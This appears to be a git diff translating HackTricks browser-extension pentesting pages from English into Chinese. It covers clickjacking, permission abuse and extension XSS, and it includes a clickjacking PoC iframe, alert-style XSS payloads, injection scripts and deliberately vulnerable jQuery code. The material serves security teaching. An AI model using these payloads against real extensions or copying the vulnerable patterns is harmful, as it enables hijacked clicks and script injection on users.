+为了解决此漏洞，实施了一个简单的解决方案：从 `web_accessible_resources` 列表中移除 `/skin/*`。此更改有效地降低了风险，确保 `skin/` 目录的内容无法通过网络可访问资源进行访问或操作。
 
-To address this vulnerability, a straightforward solution was implemented: the removal of `/skin/*` from the list of `web_accessible_resources`. This change effectively mitigated the risk by ensuring that the content of the `skin/` directory could not be accessed or manipulated through web-accessible resources.
-
-The fix was easy: **remove `/skin/*` from the `web_accessible_resources`**.
+修复很简单：**从 `web_accessible_resources` 中移除 `/skin/*`**。
 
 ### PoC
-
 ```html
 <!--https://blog.lizzie.io/clickjacking-privacy-badger.html-->
 
 <style>
-  iframe {
-    width: 430px;
-    height: 300px;
-    opacity: 0.01;
-    float: top;
-    position: absolute;
-  }
+iframe {
+width: 430px;
+height: 300px;
+opacity: 0.01;
+float: top;
+position: absolute;
+}
 
-  #stuff {
-    float: top;
-    position: absolute;
-  }
+#stuff {
+float: top;
+position: absolute;
+}
 
-  button {
-    float: top;
-    position: absolute;
-    top: 168px;
-    left: 100px;
-  }
+button {
+float: top;
+position: absolute;
+top: 168px;
+left: 100px;
+}
 </style>
 
 <div id="stuff">
-  <h1>Click the button</h1>
-  <button id="button">click me</button>
+<h1>Click the button</h1>
+<button id="button">click me</button>
 </div>
 
 <iframe
-  src="chrome-extension://ablpimhddhnaldgkfbpafchflffallca/skin/popup.html">
+src="chrome-extension://ablpimhddhnaldgkfbpafchflffallca/skin/popup.html">
 </iframe>
 ```
+## Metamask 示例
 
-## Metamask Example
-
-A [**blog post about a ClickJacking in metamask can be found here**](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9). In this case, Metamask fixed the vulnerability by checking that the protocol used to access it was **`https:`** or **`http:`** (not **`chrome:`** for example):
+一个关于 Metamask 中 ClickJacking 的[**博客文章可以在这里找到**](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9)。在这种情况下，Metamask 通过检查访问所使用的协议是否为 **`https:`** 或 **`http:`**（例如不是 **`chrome:`**）来修复漏洞：
 
 <figure><img src="../../images/image (21).png" alt=""><figcaption></figcaption></figure>
 
-**Another ClickJacking fixed** in the Metamask extension was that users were able to **Click to whitelist** when a page was suspicious of being phishing because of `“web_accessible_resources”: [“inpage.js”, “phishing.html”]`. As that page was vulnerable to Clickjacking, an attacker could abuse it showing something normal to make the victim click to whitelist it without noticing, and then going back to the phishing page which will be whitelisted.
+**另一个在 Metamask 扩展中修复的 ClickJacking** 是用户能够在页面被怀疑为钓鱼时 **点击以列入白名单**，因为 `“web_accessible_resources”: [“inpage.js”, “phishing.html”]`。由于该页面易受 Clickjacking 攻击，攻击者可以利用它显示一些正常的内容，使受害者在未注意的情况下点击以列入白名单，然后再返回到将被列入白名单的钓鱼页面。
 
-## Steam Inventory Helper Example
+## Steam Inventory Helper 示例
 
-Check the following page to check how a **XSS** in a browser extension was chained with a **ClickJacking** vulnerability:
+查看以下页面以检查如何将浏览器扩展中的 **XSS** 与 **ClickJacking** 漏洞链式结合：
 
 {{#ref}}
 browext-xss-example.md
 {{#endref}}
 
-## References
+## 参考文献
 
 - [https://blog.lizzie.io/clickjacking-privacy-badger.html](https://blog.lizzie.io/clickjacking-privacy-badger.html)
 - [https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md b/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
index 2021e3d7d..4d895a160 100644
--- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
+++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
@@ -2,113 +2,110 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
 ### **`permissions`**
 
-Permissions are defined in the extension's **`manifest.json`** file using the **`permissions`** property and allow access to almost anything a browser can access (Cookies or Physical Storage):
+权限在扩展的 **`manifest.json`** 文件中使用 **`permissions`** 属性定义，允许访问浏览器可以访问的几乎所有内容（Cookies 或物理存储）：
 
-The previous manifest declares that the extension requires the `storage` permission. This means that it can use [the storage API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/storage) to store its data persistently. Unlike cookies or `localStorage` APIs which give users some level of control, **extension storage can normally only be cleared by uninstalling the extension**.
+前面的清单声明该扩展需要 `storage` 权限。这意味着它可以使用 [存储 API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/storage) 持久地存储其数据。与给用户某种控制级别的 cookies 或 `localStorage` API 不同，**扩展存储通常只能通过卸载扩展来清除**。
 
-An extension will request the permissions indicated in its **`manifest.json`** file and After installing the extension, you can **always check its permissions in your browser**, as shown in this image:
+扩展将请求其 **`manifest.json`** 文件中指示的权限。安装扩展后，您可以 **始终在浏览器中检查其权限**，如图所示：
 
 <figure><img src="../../images/image (18).png" alt=""><figcaption></figcaption></figure>
 
-You can find the [**complete list of permissions a Chromium Browser Extension can request here**](https://developer.chrome.com/docs/extensions/develop/concepts/declare-permissions#permissions) and a [**complete list for Firefox extensions here**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#api_permissions)**.**
+您可以在这里找到 [**Chromium 浏览器扩展可以请求的完整权限列表**](https://developer.chrome.com/docs/extensions/develop/concepts/declare-permissions#permissions) 和 [**Firefox 扩展的完整列表在这里**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#api_permissions)**。**
 
 ### `host_permissions`
 
-The optional but powerful setting **`host_permissions`** indicates with which hosts the extension is going to be able to interact via apis such as [`cookies`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/cookies), [`webRequest`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/webRequest), and [`tabs`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs).
-
-The following `host_permissions` basically allow every web:
+可选但强大的设置 **`host_permissions`** 指示扩展将能够通过 [`cookies`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/cookies)、[`webRequest`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/webRequest) 和 [`tabs`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs) 等 API 与哪些主机进行交互。
 
+以下 `host_permissions` 基本上允许每个网站：
 ```json
 "host_permissions": [
-  "*://*/*"
+"*://*/*"
 ]
 
 // Or:
 "host_permissions": [
-  "http://*/*",
-  "https://*/*"
+"http://*/*",
+"https://*/*"
 ]
 
 // Or:
 "host_permissions": [
-  "<all_urls>"
+"<all_urls>"
 ]
 ```
+这些是浏览器扩展可以自由访问的主机。这是因为当浏览器扩展调用 **`fetch("https://gmail.com/")`** 时，它不受 CORS 的限制。
 
-These are the hosts that the browser extension can access freely. This is because when a browser extension calls **`fetch("https://gmail.com/")`** it's not restricted by CORS.
+## 滥用 `permissions` 和 `host_permissions`
 
-## Abusing `permissions` and `host_permissions`
+### 标签
 
-### Tabs
-
-Moreover, **`host_permissions`** also unlock “advanced” [**tabs API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs) **functionality.** They allow the extension to call [tabs.query()](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/query) and not only get a **list of user’s browser tabs** back but also learn which **web page (meaning address and title) is loaded**.
+此外，**`host_permissions`** 还解锁了“高级” [**tabs API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs) **功能。** 它们允许扩展调用 [tabs.query()](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/query)，不仅可以获取 **用户的浏览器标签列表**，还可以了解哪个 **网页（即地址和标题）被加载**。
 
 > [!CAUTION]
-> Not only that, listeners like [**tabs.onUpdated**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/onUpdated) **become way more useful as well**. These will be notified whenever a new page loads into a tab.
+> 不仅如此，像 [**tabs.onUpdated**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/onUpdated) **这样的监听器也变得更加有用。** 每当新页面加载到标签中时，它们将收到通知。
 
-### Running content scripts <a href="#running-content-scripts" id="running-content-scripts"></a>
+### 运行内容脚本 <a href="#running-content-scripts" id="running-content-scripts"></a>
 
-Content scripts aren’t necessarily written statically into the extension manifest. Given sufficient **`host_permissions`**, **extensions can also load them dynamically by calling** [**tabs.executeScript()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/executeScript) **or** [**scripting.executeScript()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/scripting/executeScript).
+内容脚本不一定是静态写入扩展清单中的。只要有足够的 **`host_permissions`**，**扩展也可以通过调用** [**tabs.executeScript()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/executeScript) **或** [**scripting.executeScript()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/scripting/executeScript) **动态加载它们。**
 
-Both APIs allow executing not merely files contained in the extensions as content scripts but also **arbitrary cod**e. The former allows passing in JavaScript code as a string while the latter expects a JavaScript function which is less prone to injection vulnerabilities. Still, both APIs will wreak havoc if misused.
+这两个 API 允许执行不仅仅是包含在扩展中的文件作为内容脚本，还可以执行 **任意代码**。前者允许将 JavaScript 代码作为字符串传入，而后者期望一个 JavaScript 函数，这样更不容易受到注入漏洞的影响。不过，如果滥用这两个 API，都会造成严重后果。
 
 > [!CAUTION]
-> In addition to the capabilities above, content scripts could for example **intercept credentials** as these are entered into web pages. Another classic way to abuse them is **injecting advertising** on each an every website. Adding **scam messages** to abuse credibility of news websites is also possible. Finally, they could **manipulate banking** websites to reroute money transfers.
+> 除了上述功能外，内容脚本还可以例如 **拦截凭据**，当这些凭据被输入到网页时。滥用它们的另一种经典方式是 **在每个网站上注入广告**。添加 **诈骗信息** 以滥用新闻网站的可信度也是可能的。最后，它们可以 **操纵银行** 网站以重新路由资金转移。
 
-### Implicit privileges <a href="#implicit-privileges" id="implicit-privileges"></a>
+### 隐式权限 <a href="#implicit-privileges" id="implicit-privileges"></a>
 
-Some extension privileges **don’t have to be explicitly declared**. One example is the [tabs API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs): its basic functionality is accessible without any privileges whatsoever. Any extension can be notified when you open and close tabs, it merely won’t know which website these tabs correspond with.
+某些扩展权限 **不必明确声明**。一个例子是 [tabs API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs)：其基本功能在没有任何权限的情况下也可以访问。任何扩展都可以在您打开和关闭标签时收到通知，只是它不会知道这些标签对应哪个网站。
 
-Sounds too harmless? The [tabs.create() API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/create) is somewhat less so. It can be used to **create a new tab**, essentially the same as [window.open()](https://developer.mozilla.org/en-US/docs/Web/API/Window/open) which can be called by any website. Yet while `window.open()` is subject to the **pop-up blocker, `tabs.create()` isn’t**.
+听起来太无害了？[tabs.create() API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/create) 就不那么无害了。它可以用来 **创建一个新标签**，本质上与任何网站都可以调用的 [window.open()](https://developer.mozilla.org/en-US/docs/Web/API/Window/open) 相同。然而，虽然 `window.open()` 受 **弹出窗口拦截器** 的限制，但 `tabs.create()` 不受此限制。
 
 > [!CAUTION]
-> An extension can create any number of tabs whenever it wants.
+> 扩展可以在任何时候创建任意数量的标签。
 
-If you look through possible `tabs.create()` parameters, you’ll also notice that its capabilities go way beyond what `window.open()` is allowed to control. And while Firefox doesn’t allow `data:` URIs to be used with this API, Chrome has no such protection. **Use of such URIs on the top level has been** [**banned due to being abused for phishing**](https://bugzilla.mozilla.org/show_bug.cgi?id=1331351)**.**
+如果您查看可能的 `tabs.create()` 参数，您还会注意到它的功能远远超出了 `window.open()` 被允许控制的范围。虽然 Firefox 不允许在此 API 中使用 `data:` URI，但 Chrome 没有这样的保护。**在顶层使用此类 URI 已被** [**禁止，因为被滥用于网络钓鱼**](https://bugzilla.mozilla.org/show_bug.cgi?id=1331351)**。**
 
-[**tabs.update()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/update) is very similar to `tabs.create()` but will **modify an existing tab**. So a malicious extension can for example arbitrarily load an advertising page into one of your tabs, and it can activate the corresponding tab as well.
+[**tabs.update()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/update) 与 `tabs.create()` 非常相似，但会 **修改现有标签**。因此，恶意扩展可以例如任意加载一个广告页面到您的一个标签中，并且它可以激活相应的标签。
 
-### Webcam, geolocation and friends <a href="#webcam-geolocation-and-friends" id="webcam-geolocation-and-friends"></a>
+### 网络摄像头、地理位置等 <a href="#webcam-geolocation-and-friends" id="webcam-geolocation-and-friends"></a>
 
-You probably know that websites can request special permissions, e.g. in order to access your webcam (video conferencing tools) or geographical location (maps). It’s features with considerable potential for abuse, so users each time have to confirm that they still want this.
+您可能知道，网站可以请求特殊权限，例如访问您的网络摄像头（视频会议工具）或地理位置（地图）。这是具有相当滥用潜力的功能，因此用户每次都必须确认他们仍然希望这样做。
 
 > [!CAUTION]
-> Not so with browser extensions. **If a browser extension** [**wants access to your webcam or microphone**](https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia)**, it only needs to ask for permission once**
+> 浏览器扩展则不是。**如果浏览器扩展** [**想要访问您的网络摄像头或麦克风**](https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia)**，它只需请求一次权限**
 
-Typically, an extension will do so immediately after being installed. Once this prompt is accepted, **webcam access is possible at any time**, even if the user isn’t interacting with the extension at this point. Yes, a user will only accept this prompt if the extension really needs webcam access. But after that they have to trust the extension not to record anything secretly.
+通常，扩展会在安装后立即这样做。一旦接受了此提示，**网络摄像头访问在任何时候都是可能的**，即使用户此时没有与扩展交互。是的，用户只有在扩展确实需要网络摄像头访问时才会接受此提示。但在那之后，他们必须信任扩展不会秘密录制任何内容。
 
-With access to [your exact geographical location](https://developer.mozilla.org/en-US/docs/Web/API/Geolocation) or [contents of your clipboard](https://developer.mozilla.org/en-US/docs/Web/API/Clipboard_API), granting permission explicitly is unnecessary altogether. **An extension simply adds `geolocation` or `clipboard` to the** [**permissions entry**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions) **of its manifest**. These access privileges are then granted implicitly when the extension is installed. So a malicious or compromised extension with these privileges can create your movement profile or monitor your clipboard for copied passwords without you noticing anything.
+通过访问 [您的确切地理位置](https://developer.mozilla.org/en-US/docs/Web/API/Geolocation) 或 [剪贴板内容](https://developer.mozilla.org/en-US/docs/Web/API/Clipboard_API)，显式授予权限根本不必要。**扩展只需将 `geolocation` 或 `clipboard` 添加到其** [**权限条目**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions) **中。** 这些访问权限在扩展安装时隐式授予。因此，具有这些权限的恶意或被攻陷的扩展可以在您未注意到的情况下创建您的移动档案或监控您剪贴板中复制的密码。
 
-Adding the **`history`** keyword to the [permissions entry](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions) of the extension manifest grants **access to the** [**history API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/history). It allows retrieving the user’s entire browsing history all at once, without waiting for the user to visit these websites again.
+将 **`history`** 关键字添加到扩展清单的 [权限条目](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions) 中授予 **访问** [**history API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/history) 的权限。它允许一次性检索用户的整个浏览历史，而无需等待用户再次访问这些网站。
 
-The **`bookmarks`** **permission** has similar abuse potential, this one allows **reading out all bookmarks via the** [**bookmarks API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/bookmarks).
+**`bookmarks`** **权限** 具有类似的滥用潜力，它允许 **通过** [**bookmarks API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/bookmarks) **读取所有书签。**
 
-### Storage permission <a href="#the-storage-permission" id="the-storage-permission"></a>
+### 存储权限 <a href="#the-storage-permission" id="the-storage-permission"></a>
 
-The extension storage is merely a key-value collection, very similar to [localStorage](https://developer.mozilla.org/en-US/docs/Web/API/Window/localStorage) that any website could use. So no sensitive information should be stored here.
+扩展存储仅仅是一个键值集合，非常类似于任何网站都可以使用的 [localStorage](https://developer.mozilla.org/en-US/docs/Web/API/Window/localStorage)。因此，不应在此处存储敏感信息。
 
-However, advertising companies could also abuse this storage.
+然而，广告公司也可能滥用此存储。
 
-### More permissions
+### 更多权限
 
-You can find the [**complete list of permissions a Chromium Browser Extension can request here**](https://developer.chrome.com/docs/extensions/develop/concepts/declare-permissions#permissions) and a [**complete list for Firefox extensions here**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#api_permissions)**.**
+您可以在 [**这里找到 Chromium 浏览器扩展可以请求的完整权限列表**](https://developer.chrome.com/docs/extensions/develop/concepts/declare-permissions#permissions)，以及 [**Firefox 扩展的完整列表在这里**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#api_permissions)**。**
 
-## Prevention <a href="#why-not-restrict-extension-privileges" id="why-not-restrict-extension-privileges"></a>
+## 预防 <a href="#why-not-restrict-extension-privileges" id="why-not-restrict-extension-privileges"></a>
 
-The policy of Google's developer explicitly forbids extensions from requesting more privileges than necessary for their functionality, effectively mitigating excessive permission requests. An instance where a browser extension overstepped this boundary involved its distribution with the browser itself rather than through an add-on store.
+谷歌开发者的政策明确禁止扩展请求超出其功能所需的权限，从而有效减轻过度权限请求的情况。一个浏览器扩展超越这一界限的实例涉及其与浏览器本身一起分发，而不是通过附加组件商店。
 
-Browsers could further curb the misuse of extension privileges. For instance, Chrome's [tabCapture](https://developer.chrome.com/docs/extensions/reference/tabCapture/) and [desktopCapture](https://developer.chrome.com/docs/extensions/reference/desktopCapture/) APIs, used for screen recording, are designed to minimize abuse. The tabCapture API can only be activated through direct user interaction, such as clicking on the extension icon, while desktopCapture requires user confirmation for the window to be recorded, preventing clandestine recording activities.
+浏览器还可以进一步遏制扩展权限的滥用。例如，Chrome 的 [tabCapture](https://developer.chrome.com/docs/extensions/reference/tabCapture/) 和 [desktopCapture](https://developer.chrome.com/docs/extensions/reference/desktopCapture/) API，用于屏幕录制，旨在最小化滥用。tabCapture API 只能通过直接用户交互激活，例如点击扩展图标，而 desktopCapture 需要用户确认要录制的窗口，从而防止秘密录制活动。
 
-However, tightening security measures often results in decreased flexibility and user-friendliness of extensions. The [activeTab permission](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#activetab_permission) illustrates this trade-off. It was introduced to eliminate the need for extensions to request host privileges across the entire internet, allowing extensions to access only the current tab upon explicit activation by the user. This model is effective for extensions requiring user-initiated actions but falls short for those requiring automatic or pre-emptive actions, thereby compromising convenience and immediate responsiveness.
+然而，收紧安全措施往往会导致扩展的灵活性和用户友好性降低。[activeTab 权限](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#activetab_permission) 说明了这种权衡。它的引入消除了扩展请求整个互联网的主机权限的需要，允许扩展在用户明确激活时仅访问当前标签。该模型对于需要用户主动操作的扩展有效，但对于需要自动或预先操作的扩展则显得不足，从而妨碍了便利性和即时响应。
 
-## **References**
+## **参考文献**
 
 - [https://palant.info/2022/08/17/impact-of-extension-privileges/](https://palant.info/2022/08/17/impact-of-extension-privileges/)
 - [https://www.cobalt.io/blog/introduction-to-chrome-browser-extension-security-testing](https://www.cobalt.io/blog/introduction-to-chrome-browser-extension-security-testing)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md b/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md
index 8ac44003f..865223402 100644
--- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md
+++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md
@@ -1,114 +1,100 @@
-# BrowExt - XSS Example
+# BrowExt - XSS 示例
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Cross-Site Scripting (XSS) through Iframe
-
-In this setup, a **content script** is implemented to instantiate an Iframe, incorporating a URL with query parameters as the source of the Iframe:
+## 通过 Iframe 的跨站脚本攻击 (XSS)
 
+在此设置中，实施了一个 **内容脚本** 来实例化一个 Iframe，将带有查询参数的 URL 作为 Iframe 的源：
 ```javascript
 chrome.storage.local.get("message", (result) => {
-  let constructedURL =
-    chrome.runtime.getURL("message.html") +
-    "?content=" +
-    encodeURIComponent(result.message) +
-    "&redirect=https://example.net/details"
-  frame.src = constructedURL
+let constructedURL =
+chrome.runtime.getURL("message.html") +
+"?content=" +
+encodeURIComponent(result.message) +
+"&redirect=https://example.net/details"
+frame.src = constructedURL
 })
 ```
-
-A publicly accessible HTML page, **`message.html`**, is designed to dynamically add content to the document body based on the parameters in the URL:
-
+一个公开可访问的 HTML 页面，**`message.html`**，旨在根据 URL 中的参数动态添加内容到文档主体：
 ```javascript
 $(document).ready(() => {
-  let urlParams = new URLSearchParams(window.location.search)
-  let userContent = urlParams.get("content")
-  $(document.body).html(
-    `${userContent} <button id='detailBtn'>Details</button>`
-  )
-  $("#detailBtn").on("click", () => {
-    let destinationURL = urlParams.get("redirect")
-    chrome.tabs.create({ url: destinationURL })
-  })
+let urlParams = new URLSearchParams(window.location.search)
+let userContent = urlParams.get("content")
+$(document.body).html(
+`${userContent} <button id='detailBtn'>Details</button>`
+)
+$("#detailBtn").on("click", () => {
+let destinationURL = urlParams.get("redirect")
+chrome.tabs.create({ url: destinationURL })
+})
 })
 ```
-
-A malicious script is executed on an adversary's page, modifying the `content` parameter of the Iframe's source to introduce a **XSS payload**. This is achieved by updating the Iframe's source to include a harmful script:
-
+在对手的页面上执行恶意脚本，修改 Iframe 源的 `content` 参数以引入 **XSS payload**。通过更新 Iframe 的源以包含有害脚本来实现这一点：
 ```javascript
 setTimeout(() => {
-  let targetFrame = document.querySelector("iframe").src
-  let baseURL = targetFrame.split("?")[0]
-  let xssPayload = "<img src='invalid' onerror='alert(\"XSS\")'>"
-  let maliciousURL = `${baseURL}?content=${encodeURIComponent(xssPayload)}`
+let targetFrame = document.querySelector("iframe").src
+let baseURL = targetFrame.split("?")[0]
+let xssPayload = "<img src='invalid' onerror='alert(\"XSS\")'>"
+let maliciousURL = `${baseURL}?content=${encodeURIComponent(xssPayload)}`
 
-  document.querySelector("iframe").src = maliciousURL
+document.querySelector("iframe").src = maliciousURL
 }, 1000)
 ```
-
-An overly permissive Content Security Policy such as:
-
+过于宽松的内容安全策略，例如：
 ```json
 "content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self';"
 ```
+允许执行JavaScript，使系统容易受到XSS攻击。
 
-allows the execution of JavaScript, making the system vulnerable to XSS attacks.
-
-An alternative approach to provoke the XSS involves creating an Iframe element and setting its source to include the harmful script as the `content` parameter:
-
+引发XSS的另一种方法是创建一个Iframe元素，并将其源设置为包含有害脚本作为`content`参数：
 ```javascript
 let newFrame = document.createElement("iframe")
 newFrame.src =
-  "chrome-extension://abcdefghijklmnopabcdefghijklmnop/message.html?content=" +
-  encodeURIComponent("<img src='x' onerror='alert(\"XSS\")'>")
+"chrome-extension://abcdefghijklmnopabcdefghijklmnop/message.html?content=" +
+encodeURIComponent("<img src='x' onerror='alert(\"XSS\")'>")
 document.body.append(newFrame)
 ```
-
 ## DOM-based XSS + ClickJacking
 
-This example was taken from the [original post writeup](https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/).
-
-The core issue arises from a DOM-based Cross-site Scripting (XSS) vulnerability located in **`/html/bookmarks.html`**. The problematic JavaScript, part of **`bookmarks.js`**, is detailed below:
+这个例子取自于 [original post writeup](https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/)。
 
+核心问题源于位于 **`/html/bookmarks.html`** 的基于DOM的跨站脚本（XSS）漏洞。以下是有问题的JavaScript，属于 **`bookmarks.js`**：
 ```javascript
 $("#btAdd").on("click", function () {
-  var bookmarkName = $("#txtName").val()
-  if (
-    $(".custom-button .label").filter(function () {
-      return $(this).text() === bookmarkName
-    }).length
-  )
-    return false
+var bookmarkName = $("#txtName").val()
+if (
+$(".custom-button .label").filter(function () {
+return $(this).text() === bookmarkName
+}).length
+)
+return false
 
-  var bookmarkItem = $('<div class="custom-button">')
-  bookmarkItem.html('<span class="label">' + bookmarkName + "</span>")
-  bookmarkItem.append('<button class="remove-btn" title="delete">x</button>')
-  bookmarkItem.attr("data-title", bookmarkName)
-  bookmarkItem.data("timestamp", new Date().getTime())
-  $("section.bookmark-container .existing-items").append(bookmarkItem)
-  persistData()
+var bookmarkItem = $('<div class="custom-button">')
+bookmarkItem.html('<span class="label">' + bookmarkName + "</span>")
+bookmarkItem.append('<button class="remove-btn" title="delete">x</button>')
+bookmarkItem.attr("data-title", bookmarkName)
+bookmarkItem.data("timestamp", new Date().getTime())
+$("section.bookmark-container .existing-items").append(bookmarkItem)
+persistData()
 })
 ```
+该代码片段从 **`txtName`** 输入字段获取 **值**，并使用 **字符串连接生成 HTML**，然后通过 jQuery 的 `.append()` 函数将其附加到 DOM。
 
-This snippet fetches the **value** from the **`txtName`** input field and uses **string concatenation to generate HTML**, which is then appended to the DOM using jQuery’s `.append()` function.
+通常，Chrome 扩展的内容安全策略 (CSP) 会防止此类漏洞。然而，由于 **CSP 放宽了 ‘unsafe-eval’** 和使用 jQuery 的 DOM 操作方法（这些方法使用 [`globalEval()`](https://api.jquery.com/jquery.globaleval/) 将脚本传递给 [`eval()`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval) 在 DOM 插入时），仍然可以进行利用。
 
-Typically, the Chrome extension's Content Security Policy (CSP) would prevent such vulnerabilities. However, due to **CSP relaxation with ‘unsafe-eval’** and the use of jQuery’s DOM manipulation methods (which employ [`globalEval()`](https://api.jquery.com/jquery.globaleval/) to pass scripts to [`eval()`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval) upon DOM insertion), exploitation is still possible.
-
-While this vulnerability is significant, its exploitation is usually contingent on user interaction: visiting the page, entering an XSS payload, and activating the “Add” button.
-
-To enhance this vulnerability, a secondary **clickjacking** vulnerability is exploited. The Chrome extension's manifest showcases an extensive `web_accessible_resources` policy:
+虽然这个漏洞很重要，但其利用通常依赖于用户交互：访问页面、输入 XSS 负载并激活“添加”按钮。
 
+为了增强这个漏洞，利用了一个次要的 **clickjacking** 漏洞。Chrome 扩展的清单展示了一个广泛的 `web_accessible_resources` 策略：
 ```json
 "web_accessible_resources": [
-    "html/bookmarks.html",
-    "dist/*",
-    "assets/*",
-    "font/*",
-    [...]
+"html/bookmarks.html",
+"dist/*",
+"assets/*",
+"font/*",
+[...]
 ],
 ```
-
-Notably, the **`/html/bookmarks.html`** page is prone to framing, thus vulnerable to **clickjacking**. This vulnerability is leveraged to frame the page within an attacker’s site, overlaying it with DOM elements to redesign the interface deceptively. This manipulation leads victims to interact with the underlying extension unintentionally.
+值得注意的是，**`/html/bookmarks.html`** 页面容易受到框架攻击，因此容易受到 **clickjacking** 的影响。此漏洞被利用，将页面嵌入攻击者的网站中，并用 DOM 元素覆盖，从而欺骗性地重新设计界面。这种操控导致受害者无意中与底层扩展进行交互。
 
 ## References
 
@@ -116,4 +102,3 @@ Notably, the **`/html/bookmarks.html`** page is prone to framing, thus vulnerabl
 - [https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/](https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/cache-deception/README.md b/src/pentesting-web/cache-deception/README.md
index 38d5e764f..aaad6dec8 100644
--- a/src/pentesting-web/cache-deception/README.md
+++ b/src/pentesting-web/cache-deception/README.md
@@ -1,150 +1,139 @@
-# Cache Poisoning and Cache Deception
+# 缓存中毒和缓存欺骗
 
 {{#include ../../banners/hacktricks-training.md}}
 
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=cache-deception) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=cache-deception) 轻松构建和 **自动化工作流**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=cache-deception" %}
 
-## The difference
+## 区别
 
